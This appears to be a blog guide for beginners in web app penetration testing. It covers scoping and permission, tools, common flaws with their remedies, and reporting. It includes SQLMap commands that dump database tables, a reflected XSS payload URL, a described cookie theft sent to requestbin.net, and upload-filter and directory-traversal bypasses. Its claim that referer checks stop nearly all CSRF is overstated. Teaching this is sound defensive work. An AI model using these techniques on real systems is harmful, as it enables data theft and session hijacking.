Home A Beginners Guide To Everything WebApp Pentesting
Post
Cancel

A Beginners Guide To Everything WebApp Pentesting

So you want to be a pentester

    There's a ton of different types of pentesting that you can do. What we'll talk about here though is website pentesting. This is the type of pentesting that will help developers secure websites that you and other people, potentially globally, will have access to so it's pretty important. But there are a lot of ways to remove any of the value that it can bring project owners. Some testers for instance will only use automated tools and don't understand the output that they generate and just hand over a report. This is unhelpful because as a pentester it's your duty to know why vulnerabilities appear on Burp and how to resolve them. Building off of that, as well as knowing the vulnerabilities, you should understand any solutions you offer and avoid canned suggestions. Today we will review the necessary prep work, what tools to use, common vulnerabilities to look for, and how to put it together in a report. This post is intended for people who are new to web app pentesting or those who want to know whats needed at a semi technical level in order to succeed. Also note, all demonstrations are either using culbertreport.com or a vulnerable version of OrangeHRM/LotusCMS.

The paperwork

    Before you begin an actual pentest, there are some important items that you need to get out of the way. Of those, permission and scope will be the most important ones. Get a proper scope defined for what URLs are valid, what accounts can be targeted, and what must be explicitly avoided. In the same vein, make sure you have full permission from the web site owners to perform the pentest. Without these, you're treading on thin ice.
 

    The typical scope discussion and documentation will tell you that there are numerous URLs like subdir1.staging.culbertreport.com that are in scope, whether or not you're testing the staging environment (and you should really only test there) and whether or not it contains real data - you need to know whether or not the data you may see is potentially real PHI, for example, as there are other liabilities around this and BAA's that need to be signed. You also may or may not be given an account to use and you should also be given a point of contact who controls the webapp environment. This is to be used to relay findings but also in case you get locked out of the testing environment, something gets broken, or an attack accidentally leaks over to production and it needs to be remedied.

Tools to use

    Now that you've gotten the paper work out of the way, what tools do you use? Well there are a ton of tools, both paid and free, out there but really you will be fine with using 3/5 of the below for 99% of your engagements. 

Burp Suite

    Tried and true. This is in everyone's tool box because it has 99% of everything you will need in an engagement and, if it doesn't, there's either a plugin already made for it or you can write one for it. 
 
     
    For those unfamiliar with the tool, there's a LOT to take in with this screen. The majority of your work will be done in the proxy and the repeater tab. The proxy is where you will either direct your browsers traffic through or launch a custom Chromium instance and see all of the traffic you've generated pass through, and the repeater allows you to send different requests repeatedly while changing whatever parameters you wish to in that request. Other tabs you may use include the sequencer, which will tell you whether or not there are issues with how cookies are generated, and the extender page where you can download extensions like I have for JSON Web Tokens.
  • Burp Suite Enterprise

    Burp Enterprise is fantastic for automating the more mundane portions of your engagements and for passively collecting vulnerability details as you work as well as running auditing scans. If your organization can afford an enterprise license, the tools that come with it will make the cost well worth it. Some highlights that are worth noting include the auditing scans to test for every exploit possible against every URL - though it's very important that this is only run against a staging environment that can be broken and you should not rely on this to find everything exploitable. Another highlight is that while you browse the site, Burp will passively note vulnerable components. For instance potentially there was a JS dependency that was missed by your manual investigation.

OWASP Zap

    The lesser known cousin to Burp. It has much the same toolkit but in a slightly different UI. There's not much to say here, it's a cool tool and you can't go wrong using it. 
 
     
    If you're coming from Burp, this UI makes far less sense initially. But as you use it, it quickly becomes apparent where the features you've come to expect with Burp hide under, and one bonus is that Zap will do passive enumeration of issues similar to how Burp Enterprise does. 
 

    As well as the passive enumeration, the request editor works much the same was as Burp Suites version, just a slightly different UI.
 

SQLMap

    If you see SQL errors during an engagement, you can break out SQLMap to see if any of it is truly exploitable. I personally find SQLMap is best used with a valid request taken from Zap or Burp saved to a text file. This way you don't have to spend time messing with authorization parameters to reach the point you want to test. The tool will be demonstrated further below but your typical flow will look like this: 
  1. sqlmap -r request.txt # SQLMap will figure out what position is exploitable in the request
  2. sqlmap -r request.txt --dbs  # We then get the different databases
  3. sqlmap -r request.txt -D target_DB --tables # Get the tables from the target DB
  4. sqlmap -r request.txt -D target_DB -T target_table -dump # Then finally dump the contents of the table

SSLscan 

    This tool, for the most part, is covered by what's provided through Burp Enterprise. But if you don't have one of those licenses, this will be a nice compliment to your toolkit. SSLScan examines encrypted communications, such as HTTPS, and finds all the ciphers that are supported. This is the non flashy side of web app testing. Determining if weak ciphers are in use or if protocols that would be regulatory failings are in use is very important.

Common vulnerabilities you'll test for

    Now that you've got your tools selected and tested, you're going to start wanting to test the website. But what do you look for and why? Do you stick with the OWASP top 10? It's a respectable list but it's not nearly inclusive of everything you should look at.

CSRF

    Cross-site request forgery. An easy one to test for and really important for testers to find attackable examples. This occurs when you are allowed to send requests with the referer field being set to another host. Typically, when you click a function in a site, a request is sent and the referer field tells the site where this is coming from.
 
 
    But with CSRF, this field is not properly validated. For example, see the below request.
 
     
    In the above picture, the referer is set to attacker.com. Why is this bad? Take for example a site that requires admins manually add new users to it. Through testing, you may be able to determine the fields that are expected to sign up a user with but you still don't have the required permissions to add yourself. If you can trick an admin level user into clicking a button on another site that fires off this POST though, and that admin has a currently valid session, all of a sudden you're signed up! 
 
    
    An important note, validating the referer field is not the only way to protect against CSRF. There are token based systems that will be more reliable, but these are more complex and simply validating the referer will get you 99.99% of the way there.

XSS

    Cross-site scripting. Everyone's heard of it and everyone looks for it. What is it actually doing though and why is this dangerous?  First, there's a few different types of XSS to test for. 
  1. The most common one I've seen is stored, which is where you enter something like a comment on a site and then any visitors afterwards will be affected. 
  2. Followed by that is reflected, which is when you send someone a link like https://cr.culbertreport.com/search?q=<script>alert(1)</script> and upon clicking this link they trigger the alert popup. 
  3. And finally is DOM. This refers to the document object model and can be thought of similarly to reflected XSS, but they attack two different functions. This one will be by far the most complicated to attack. I really encourage anyone curious to read the OWASP entry as it explains it in the best way possible. This is the only XSS that can be executed in such a way that the server has no idea that the user fell victim to this as well. This is accomplished by using a # in the URI to fragment it and have the XSS be loaded client side by the DOM. 
    What each of these are doing is modifying web pages to have attacker supplied elements due to improper sanitization of supplied input. This can then be leveraged by an attacker to do things like stealing session cookies from users. So with the stored XSS example, we can insert an element to get the document.cookie value from users who browse there and send it off to requestbin.net. This would then let you hijack their sessions and perform actions as those compromised users. 

    The typical protections for this are to escape special characters and sanitize the user input. Escaping in this case means to invalidate potential HTML characters like "<" through methods like encoding. Sanitizing would be to strip those special characters entirely from the supplied input.

SQLi

    Another common one. This attack exploits sites that do not properly validate user supplied input before executing SQL queries with it. A common test to do this is to append a ' to the end of every input field and look for the 500 internal error response or a 200 OK that returns the SQL error. What you're doing with this test is starting a string and then not closing it, hence why the server responds with a SQL error. This can be leveraged either manually or automatically with SQLMap to then do things like dump database contents or pop a shell.

    There are a number of protections against SQL injection ranging from using prepared statements to what we did with XSS and try to escape the supplied input and treat it as a string. They each have pros and cons and it's important to remember that no solution is perfect. 

Directory traversal

    This occurs when attackers can access files outside of the web sites root directory. You typically see this with people putting a series of '../' into the URL hoping to escape as this gets interpreted by the web server sometimes as user input to move up a directory.

    Protecting against this is typically equally as simple as the attack itself. First, ensure that user input is valid and remove unexpected characters. Then second, when processing resource requests, append the requested path to the folders canonical path. This will ensure that any requests stay inside the websites root directory.

User account takeover

    This is important to test for as it could allow another bigger issue, privilege escalation. This typically takes advantage of the password reset function. Often times, this function uses your cookie to identify who you are and whose password to reset. But sometimes the application passes a user ID to the back-end which can then be modified allowing the attacker to take over another users account. 
 

    This falls under broken access control - a user should only have access to their own resources and so any requests like this need to be validated against their permissions. If proper validation were in place, the back-end would see this request and see that the requested user ID to edit did not match the users ID or permission level and then kick back an error.

Privilege escalation

    Privilege escalation is right behind user account take over because they often use the same method - poor validation on a password reset. Another method is forceful browsing. Sometimes when logging in, the page will return a redirect to the standard user page and this can be modified to point to the admin page instead, allowing elevation of user privileges especially if functions within the admin panel do not do validation on user privilege level. Forceful browsing like this can in some cases take guessing to determine the correct admin page location unless you use a tool like Dirbuster to automate this.

    Developers should ensure that all requests are validated against the users permission level. Both of these scenarios, forced browsing and accessing other users information, also falls under broken access control.

Sensitive information disclosure

    Web developers often overlook the advantage that these disclosures in error messages can give attackers. You can determine software versions, if something is a SQL back-end, what file types are allowed to be uploaded, and where in your exploitation the server stopped and kicked back an error to name a few.  
 
    
    In the above example, I've now determined the framework version, the PHP version, and the MySQL version, as well as where errors are logged on the hosting server. This is all sensitive information as I can now look up attacks specific to these version numbers and it really simplifies the exploitation job. 

    Returning errors like this is really handy in development, since it helps pinpoint exactly what is breaking, but in a production environment it gives away too much information. Instead, return generic error pages that only let users know something went wrong or the requested page is missing.

Malicious file uploads

    If a site allows you to upload things like PHP or HTML, this can be leveraged by attackers to perform actions like listing /etc/passwd.
 
    This one is overall pretty simple. If you can upload files other than what was intended, that's an issue that needs fixing. Sometimes developers do put filters and only look for image files, but they only look for strings like jpeg in the file name. So if you upload file.jpeg.php, this will bypass their filter.

    Developers should use an allow list of extensions and avoid deny lists - the possible number of extension is far too much for any one person to keep track of. In addition to this, you should review that the allowed list of extensions only contains the bare minimum of file types needed for your application to function properly.

You found a vulnerability, so what?

    Finding the vulnerability is not the end, your next responsibility is helping the client and developers fix the issues. Understanding what goes into fixing these issues is absolutely an important skill for quality pentesters to have.

    There's no shame in looking up the vulnerability on OWASP and finding a suggested solution there, but you should definitely understand why that solution works in the supplied example and be prepared for developer use cases to veer from the recommendations. Also be prepared for company priorities to shift and your finding to be downgraded. Just because OWASP says it's a high doesn't mean that your client or development team will feel the same way and ultimately it's their issue to deal with how they want. 

    Take for example SQL injection. This is a common vulnerability to encounter and OWASP has a number of suggestions for protecting against it, so which should you pick? You have prepared statements, stored procedures, allow list input validation, and escaping all user supplied input. They each have pros and cons. For instance, escaping user supplied input assumes that you are actually catching all escape attempts. On the other hand, prepared statements are generally thought of as being able to stop SQL injection attempts against the parser, but it still leaves things like logging who writes what and user defined triggers vulnerable to SQL injection. Not to mention some people join supplied input strings to create prepared statements which defeats the purpose. There are a lot of ways that attempting to solve an issue can actually open you up to further damage, so understanding the environment and the solutions you will suggest is critical.

Writing your report

    This can vary organization to organization, but typically this will include a high level discussion of the issues detected, their impact, and a total count of all the detected vulnerabilities followed by a table of each and supporting evidence. You should sort the detected vulnerabilities from high to low so that important issues catch the readers attention early and include clear steps for how to reproduce the detected issues to make developers lives easier. The faster the developers can see it in action, the faster they can determine where a fix needs to be placed and get it rolled out to staging. 

    The high level discussion allows you to outline vulnerabilities that you thought were of note and discuss their potential impact if left unpatched. Getting across the right amount of urgency is crucial as too little will result in people leaving gaping holes while too much makes them treating future findings much more lightly then maybe they should. Think about the potential impact to client and customer data or reputational impact in order to judge how critical it is that something be patched in a week or in 90 days.

    Adding as much detail in the client facing report will reduce frustration on both ends as the developers can begin implementing fixes and the testers can focus on other work that needs to be done. Make sure you have your target audience in mind too when writing this, as going to technical will result in misunderstandings but leaving it too high level will have the report receivers scratching their heads figuring out the exact thing you meant.

And that's it!

   This is what it takes at a basic level to be a competent pentester. Writing detailed reports and working with developers will be more than half your job. This is not a position where you can succeed by not working with others and especially be prepared to work with developers who are completely unfamiliar with working within a security context. Have sympathy as it's not their realm of expertise and they brought you in specifically to help them shore up this area. You can also learn a great deal from them on architecture and design philosophy.
This post is licensed under CC BY 4.0 by the author.